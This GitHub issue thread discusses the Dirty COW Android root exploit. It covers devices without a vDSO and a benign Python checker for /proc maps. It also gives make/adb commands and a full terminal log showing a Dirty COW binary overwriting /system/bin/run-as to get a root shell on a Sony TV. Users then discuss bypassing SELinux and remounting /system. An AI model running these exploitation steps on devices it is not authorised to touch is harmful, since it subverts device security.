hyln9 / VIKIROOT

CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow
GNU General Public License v3.0

Devices without VDSO #2

Closed ghost closed 7 years ago

ghost commented 7 years ago

Most armv7a (non-64bit) devices do not have VDSO enabled. Any suggestions on what might be the other places to inject?
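The question above turns on whether a given kernel exposes a vDSO mapping at all. The check below is an added example, not code from the VIKIROOT project or from anyone in this thread: it parses `/proc/<pid>/maps` text and reports which kernel-provided special mappings (`[vdso]`, `[vvar]`, `[vectors]`) are present, which is how a practitioner would confirm, before anything else, whether a 32-bit ARM device has a vDSO. The two sample maps excerpts are constructed for illustration; the `read_live_maps` helper simply reads the real file on the machine it runs on.

```python
"""Report the kernel-provided special mappings of a process (added example).

Parses /proc/<pid>/maps text. 32-bit ARM kernels built without a vDSO still
expose the [vectors] page at 0xffff0000, so seeing [vectors] but no [vdso]
is the signature of the "no VDSO" devices discussed in the thread.
"""
import re
from dataclasses import dataclass

# One maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>\S+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

# Constructed sample: armv7a kernel with kuser helpers but no vDSO.
SAMPLE_ARM32_NO_VDSO = """\
b6d6a000-b6d6c000 r-xp 00000000 b3:19 1318       /system/bin/run-as
be8f5000-be916000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]
"""

# Constructed sample: 64-bit kernel that maps a vDSO and its data page.
SAMPLE_WITH_VDSO = """\
7f8a2bf000-7f8a2c0000 r--p 00000000 00:00 0      [vvar]
7f8a2c0000-7f8a2c1000 r-xp 00000000 00:00 0      [vdso]
7ff3d21000-7ff3d42000 rw-p 00000000 00:00 0      [stack]
"""


@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    path: str


def parse_maps(text):
    """Turn maps text into Mapping records; malformed lines are skipped."""
    mappings = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        mappings.append(
            Mapping(int(m["start"], 16), int(m["end"], 16),
                    m["perms"], m["path"].strip())
        )
    return mappings


def special_mappings(text):
    """Set of bracketed kernel-provided mappings such as [vdso] or [vectors]."""
    return {m.path for m in parse_maps(text) if m.path.startswith("[")}


def has_vdso(text):
    """True when the kernel maps a vDSO page into this process."""
    return "[vdso]" in special_mappings(text)


def read_live_maps(pid="self"):
    """Read /proc/<pid>/maps on the current machine; empty string if unavailable."""
    try:
        with open(f"/proc/{pid}/maps") as fh:
            return fh.read()
    except OSError:
        return ""


def describe(text):
    """One-line human summary of what the maps text reveals."""
    found = sorted(special_mappings(text))
    verdict = "vDSO present" if has_vdso(text) else "no vDSO mapping"
    return f"{verdict}; special mappings: {', '.join(found) or 'none'}"


if __name__ == "__main__":
    print("constructed armv7a sample:", describe(SAMPLE_ARM32_NO_VDSO))
    print("constructed 64-bit sample:", describe(SAMPLE_WITH_VDSO))
    live = read_live_maps()
    if live:
        print("this machine:", describe(live))
```

Run it on the device itself (for example via `adb shell` with a Python build, or by pulling `/proc/self/maps` to a host and feeding the text to `describe`) to settle the VDSO question for a specific kernel before spending time on anything else.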

jorymorrison commented 7 years ago

Wondering this as well, trying a Sony XBR700d.

coretechsystems commented 7 years ago

Well unless we can find a different exploitable program that runs in the device's memory, I don't think the dev will bother. I was thinking we could try exploiting wpa_supplicant, but I don't think that runs in RAM so it wouldn't fit this exploit.

jorymorrison commented 7 years ago

I have heard talk on XDA regarding using wpa_supplicant but didn't have time to dig through the entire thread. https://forum.xda-developers.com/general/security/dirty-cow-t3484879 When you say you don't think it runs in ram, what do you mean? Isn't every running process going to be in memory?

I'm not sure what device you are looking at but I am thinking my best bet will be looking at some of the custom stuff Sony might have added into my TV's OS.

coretechsystems commented 7 years ago

Not EVERY process is running in memory at the same time. wpa_supplicant should be running in the background, provided WiFi is turned on.

alexbel commented 7 years ago

@jorymorrison any luck with Sony XBR700d?

jorymorrison commented 7 years ago

@alexbel https://github.com/Arinerron/CVE-2016-5195/

Enable debugging on your TV.

Clone, edit Makefile to point to your NDK binary, run make root.

[gp100@localhost CVE-2016-5195]$ make root
~/android-ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory '/home/gp100/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/home/gp100/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17912) differ

[*] size 5544
[*] mmap 0xb6d6a000
[*] currently 0xb6d6a000=464c457f
[*] madvise = 0xb6d6a000 5544
[*] /proc/self/mem 7306992 1318
[*] madvise = 0 32615
[*] exploited 0xb6d6a000=464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@BRAVIA_ATV2:/ #

The problem with this is our context 0 u:r:runas:s0 won't allow us to disable selinux and do anything useful with the shell. That's where most people are focusing their energy.

alexbel commented 7 years ago

@jorymorrison yeah, I've tried this version https://github.com/timwr/CVE-2016-5195 (original repo). It doesn't allow us to remount /system as rw. Without writable /system we can't do much.